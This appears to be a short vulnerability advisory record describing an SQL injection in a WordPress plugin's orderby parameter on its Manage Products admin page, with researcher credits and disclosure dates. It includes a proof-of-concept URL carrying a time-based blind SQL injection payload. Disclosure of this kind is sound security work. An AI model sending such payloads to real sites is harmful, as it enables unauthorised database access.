The plugin does not properly validate and sanitise the orderby parameter before using it in a SQL statement via the Manage Products admin page, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=fmwes_products&orderby=id+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-11 (about 1 years ago)
2022-05-12 (about 1 years ago)
2022-05-13 (about 1 years ago)